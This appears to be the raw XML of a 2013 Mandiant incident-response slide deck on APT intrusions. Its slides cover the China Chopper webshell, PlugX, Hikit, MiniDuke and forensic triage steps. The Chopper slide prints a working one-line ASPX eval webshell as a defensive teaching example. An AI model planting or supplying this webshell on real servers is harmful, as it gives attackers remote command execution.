          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6819900" y="5118100"/>
            <a:ext cx="1231900" cy="695698"/>
          </a:xfrm>
          <a:prstGeom prst="frame">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525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12730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Scoping with Open IOCs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8E4241-3A02-CC46-B36E-7394D8EDCFBE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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5236" y="1311275"/>
            <a:ext cx="5837382" cy="504854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17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752532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7500" y="2312987"/>
            <a:ext cx="3429000" cy="3171825"/>
          </a:xfr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Q&amp;A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8E4241-3A02-CC46-B36E-7394D8EDCFBE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>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606308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62582" y="1466448"/>
            <a:ext cx="5741718" cy="3960575"/>
          </a:xfrm>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Positions in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Product </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>development</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Consulting, federal and managed services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sales</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Marketing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.mandiant.com/hireme </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>  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CEB3EB-F4F2-46F4-8867-D3C68411A9A0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>25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Mandiant is Hiring</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="510633" y="1435101"/>
            <a:ext cx="2470073" cy="4609440"/>
          </a:xfr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pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alexandria, VA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reston, VA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>New York, NY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Los Angeles, CA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Redwood City, CA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>San Francisco, CA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Albuquerque, NM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dublin, Ireland</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16039659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1400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.mandiant.com/blog/hikit-rootkit-advanced-persistent-attack-techniques-part-1-2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>://www.mandiant.com/blog/dll-search-order-hijacking-revisited</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:hlinkClick r:id="rId4"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>www.fireeye.com/blog/technical/botnet-activities-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>www.alienvault.com/open-threat-exchange/blog/tracking-down-the-author-of-the-plugx-rat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>www.securelist.com/en/blog/208194129%20The_MiniDuke_Mystery_PDF_0_day_Government_Spy_Assembler_Micro_Backdoor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="14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Sources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8E4241-3A02-CC46-B36E-7394D8EDCFBE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>26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388671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1046" y="1338392"/>
            <a:ext cx="5988490" cy="2818938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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Threat detection, response and containment experts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Software, professional </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp; managed services, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and education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Application and network security evaluations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Offices in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CEB3EB-F4F2-46F4-8867-D3C68411A9A0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty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We are Mandiant</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder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8726" y="-162943"/>
            <a:ext cx="4053385" cy="6365847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perspectiveContrastingLeftFacing">
              <a:rot lat="20279997" lon="2400002" rev="20999994"/>
            </a:camera>
            <a:lightRig rig="soft" dir="t"/>
          </a:scene3d>
          <a:sp3d prstMaterial="matte"/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330724" y="4022260"/>
            <a:ext cx="2593233" cy="1908215"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Washington</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>New </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>York</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Los Angeles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Redwood City</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p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2499454" y="3995023"/>
            <a:ext cx="2764464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800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>San Fran</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Albuquerque</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Dublin, Ireland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9112582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Absurd Petulant </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Turkeys?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Advanced Persistent Threat!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is APT?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8E4241-3A02-CC46-B36E-7394D8EDCFBE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="C:\Users\mscutt\Documents\City College Preso\angry-turkey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29300" y="3462338"/>
            <a:ext cx="2857500" cy="2752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668065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One line </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;%@ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Page Language="Jscript"%&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Request.Item</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"],"unsafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>");%&gt;</a:t>
            </a:r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It Slices, It Dices, It’s the Chopper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>!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8E4241-3A02-CC46-B36E-7394D8EDCFBE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr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334561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Attacker GUI for ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>Webshell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600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732217" y="6410622"/>
            <a:ext cx="2061544" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{5E8E4241-3A02-CC46-B36E-7394D8EDCFBE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="C:\Users\mscutt\Documents\Webinar\webshell_frontend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4662" y="1456923"/>
            <a:ext cx="8059737" cy="48596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08103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Webshell POST Requests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8E4241-3A02-CC46-B36E-7394D8EDCFBE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 6" descr="Screen Shot 2013-07-19 at 4.35.13 PM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42" b="342"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr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6597705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Webshell POST Requests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8E4241-3A02-CC46-B36E-7394D8EDCFBE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 6" descr="Screen Shot 2013-07-19 at 4.35.13 PM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42" b="342"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr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Frame 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1466448"/>
            <a:ext cx="2421467" cy="184552"/>
          </a:xfrm>
          <a:prstGeom prst="fram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6" name="Frame 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="310444" y="2878666"/>
            <a:ext cx="8551334" cy="1919111"/>
          </a:xfrm>
          <a:prstGeom prst="frame">
            <a:avLst>
              <a:gd name="adj1" fmla="val 3252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8" name="Frame 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="310444" y="5940778"/>
            <a:ext cx="3429000" cy="390182"/>
          </a:xfrm>
          <a:prstGeom prst="fram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9" name="Down Arrow 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6350000" y="2088444"/>
            <a:ext cx="691444" cy="606778"/>
          </a:xfrm>
          <a:prstGeom prst="down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Left Arrow 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4346222" y="5940778"/>
            <a:ext cx="1241778" cy="390182"/>
          </a:xfrm>
          <a:prstGeom prst="lef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5418667" y="1539333"/>
            <a:ext cx="25823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Unusual POST request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5785555" y="5940778"/>
            <a:ext cx="214488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Unusual Response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018798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Webshell POST Requests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8E4241-3A02-CC46-B36E-7394D8EDCFBE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 6" descr="Screen Shot 2013-07-19 at 4.35.13 PM.png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42" b="342"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr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" name="Frame 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2878667" y="3048000"/>
            <a:ext cx="1566333" cy="310444"/>
          </a:xfrm>
          <a:prstGeom prst="fram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" name="Frame 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2088444" y="4078111"/>
            <a:ext cx="1016000" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="fram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8" name="Down Arrow 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3386667" y="2229556"/>
            <a:ext cx="564444" cy="691444"/>
          </a:xfrm>
          <a:prstGeom prst="down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2878667" y="1679222"/>
            <a:ext cx="23706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Base64 Encoding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Up Arrow 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2384778" y="4600222"/>
            <a:ext cx="493889" cy="776111"/>
          </a:xfrm>
          <a:prstGeom prst="up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2991555" y="5007001"/>
            <a:ext cx="239888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URL Encoding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673665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andiant_PPT_Template_2013">
  <a:themeElements>
    <a:clrScheme name="Custom 3">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="822433"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FFFFFF"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="818A8F"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="8EC9CC"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="DAAF75"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="89B96D"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="5E6A71"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="37424A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1_Office Theme">
  <a:themeElements>
    <a:clrScheme name="Custom 3">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="822433"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FFFFFF"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="818A8F"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="8EC9CC"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="DAAF75"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="89B96D"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="5E6A71"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="37424A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1F7B1C06811DE48B1835960C3D644C9" ma:contentTypeVersion="0" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="f1f4fe9f371b3eebf0f8135b3da5caa3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c64490b4aec6201516c3a874156f37b2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1DAC04CC-34C4-408E-B541-BB56E6FF7525}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/elements/1.1/"/>
    <ds:schemaRef ds:uri="http://www.w3.org/XML/1998/namespace"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/dcmitype/"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/terms/"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/package/2006/metadata/core-properties"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{083BE540-754A-4349-9BC4-5876FA8A1CE7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  <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{5FF62F9F-426D-46C0-82F4-B2C71B5A5910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Mandiant_PPT_Template_2013</Template>
  <TotalTime>8930</TotalTime>
  <Words>677</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>226</Paragraphs>
  <Slides>26</Slides>
  <Notes>12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26</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="28" baseType="lpstr">
      <vt:lpstr>Mandiant_PPT_Template_2013</vt:lpstr>
      <vt:lpstr>1_Office Theme</vt:lpstr>
      <vt:lpstr>A Day in the Life:  Stories From the Field</vt:lpstr>
      <vt:lpstr>Stories From the Field</vt:lpstr>
      <vt:lpstr>We are Mandiant</vt:lpstr>
      <vt:lpstr>What is APT?</vt:lpstr>
      <vt:lpstr>It Slices, It Dices, It’s the Chopper Webshell!</vt:lpstr>
      <vt:lpstr>Attacker GUI for ‘eval’ Webshell</vt:lpstr>
      <vt:lpstr>Webshell POST Requests</vt:lpstr>
      <vt:lpstr>Webshell POST Requests</vt:lpstr>
      <vt:lpstr>Webshell POST Requests</vt:lpstr>
      <vt:lpstr>But How? </vt:lpstr>
      <vt:lpstr>Search Order Hijinks - PlugX</vt:lpstr>
      <vt:lpstr>Signed, Sealed, Delivered</vt:lpstr>
      <vt:lpstr>Advanced Persistent Proxy Chains - Hikit</vt:lpstr>
      <vt:lpstr>Tiny Terror (MiniDuke)</vt:lpstr>
      <vt:lpstr>Let’s Find Some Evil!</vt:lpstr>
      <vt:lpstr>Process Listing</vt:lpstr>
      <vt:lpstr>Command Line History</vt:lpstr>
      <vt:lpstr>Ports Listing</vt:lpstr>
      <vt:lpstr>DNS Cache</vt:lpstr>
      <vt:lpstr>Persistence</vt:lpstr>
      <vt:lpstr>Filesystem Clues</vt:lpstr>
      <vt:lpstr>Event Logs</vt:lpstr>
      <vt:lpstr>Scoping with Open IOCs</vt:lpstr>
